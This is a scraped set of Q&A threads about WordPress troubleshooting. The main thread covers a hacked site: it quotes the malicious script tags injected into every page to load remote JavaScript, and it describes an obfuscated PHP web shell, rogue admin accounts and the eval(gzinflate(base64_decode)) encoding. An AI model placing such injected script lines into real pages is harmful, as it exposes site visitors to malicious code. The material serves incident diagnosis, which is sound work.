Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts /
gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
had the same issue few hours ago.
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok.
But how the hell somebody could control index.pho I don't know....
Related
i am trying to import demo content of premium theme but it got stuck every time and give error in console (admin-ajax.php 404 (Not Found))
without more information it´s hard to say what´s going wrong.
admi-ajax.php is a core file first step is to check if it´s in your installation.
The file should be in /wp-admin/admin.ajax.php on your server.
File rights should be set to 664.
Second step to isolate the problem is to disable all unnecessary plugins.
Maybe a poor coded Plugin causes a javascript conflict.
Put this in your /wp-config.php file.
define('CONCATENATE_SCRIPTS', false );
it will will cause the backend javascript files to load separated.
Maybe you will get more information which script is causing the error.
Some cheap hosters block access to this file.
Contact your Hoster and make sure they do not block the access for security reasons.
Hope this helps.
I am re-designing someone's Wordpress website and moslty need to change the CSS I wanted to move the entire website over to my server in order to develop it. Mostly I am just changing the design/CSS but there are some custom parts I want to keep such as there is a testimonial plug-in/widget that has a custom place in the dashboard and a way to post testimonials.
I downloaded the entire site.
Exported the database
And then moved it to my server and uploaded the files and created a new database and imported it.
Then I used this to change the database to the correct directory:
https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
Now I am getting a crazy error:
Warning: Cannot modify header information - headers already sent by (output started at /home//public_html/wordpress/wp-config.php:156) in /home/public_html/wordpress/wp-content/plugins/wp-greet-box/includes/wp-greet-box.class.php on line 493
Warning: Cannot modify header information - headers already sent by (output started at /home/llhimhi1/public_html/wordpress/wp-config.php:156) in /home/l/public_html/a/wordpress/wp-includes/pluggable.php on line 1121
I don't know if I should continue trying to make this work, or just copy the theme to a fresh install. But I am not sure what else to copy since there are custom plugins and stuff in the dashboard.
Help would be much appreciated.
A "headers already sent" error is a very common PHP error having to do with white space or junk characters in a file, or a file that was corrupted during FTP transfer. Check your wp-config.php file.
From FAQ Troubleshooting » Headers already sent warning « WordPress Codex
It is usually because there are spaces, new lines, or other stuff
before an opening tag, typically in
wp-config.php. This could be true about some other file too, so please
check the error message, as it will list the specific file name where
the error occurred (see "Interpreting the Error Message" below).
Replacing the faulty file with one from your most recent backup or one
from a fresh WordPress download is your best bet, but if neither of
those are an option, please follow the steps (at the link above).
And read http://codex.wordpress.org/Debugging_in_WordPress on how to set up debugging to find causes of "white pages" and other PHP errors.
This morning I logged onto my website and shockingly I found that it just spit out error messages and some kind of upload form was displayed. A form that basically uploads a file onto my server.
I logged into my server and had a look at the access log. It seems he accessed the function file of my wordpress theme, fully deleted the original and created an upload form out of it.
With that upload form he then uploaded the following file.
Edit: I had to copy the code to hastebin, it was too big to be posted here.
http://hastebin.com/itedinefiz.php
He named the file web-info.php. I did not run the file because I am afraid that it might do some harmful things to my site.
Could anyone tell me what this file does?
Anyway, I have restored the functions.php file of my wordpress theme and deleted that web-info.php file form the server and now it seems that the website is running again.
Oh and my guess he gained access to my website because my login credentials were very easy... very stupid of me :(
After doing a bit research this what I came up with.
The malicious file that I have posted above, was encoded using eval(gzinflate(base64_decode));
Thanks to http://ddecode.com/phpdecoder/ I was able to decoded it, here is the raw PHP file that the hacker left behind:
http://pastebin.com/fAEQn2j7
I ran the file on my local machine, holy crap! It's a full on rootkit. It has massive interface that covers pretty much anything to take over the entire server. It seems to let you browser the entire files on the server, run sql code, run php code, brutforce options, network option and so on.
I think the safest it to cancel the entire VPS that I am renting from Bluehost, a normal wordpress deinstallation won't do any good.
I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!
I'm trying to implement an upload with progress bar code i found here. But when i run my example code i get the following error in IIS7 Windows7:
Click here for larger image
I tried messing with my handlers but only messed it up more as i don't know what i'm doing. Can someone help me get this working?
It appears that your are trying to upload the file to (or trying to get process update from) a html file (fileupload.html) - now html files are considered as static files by IIS. So you can only issue GET request (there is no point in submitting POST to a static file because the content is not going to change based on POST data) and hence the error.
Perhaps, you have done integration incorrectly or may be using wrong plugin (the author is talking about using it in conjunction with apache module). You may want to look at alternatives from below links:
http://mattberseth.com/blog/2008/07/aspnet_file_upload_with_realti.html
File Upload with progress bar in Asp.Net Mvc/ jQuery?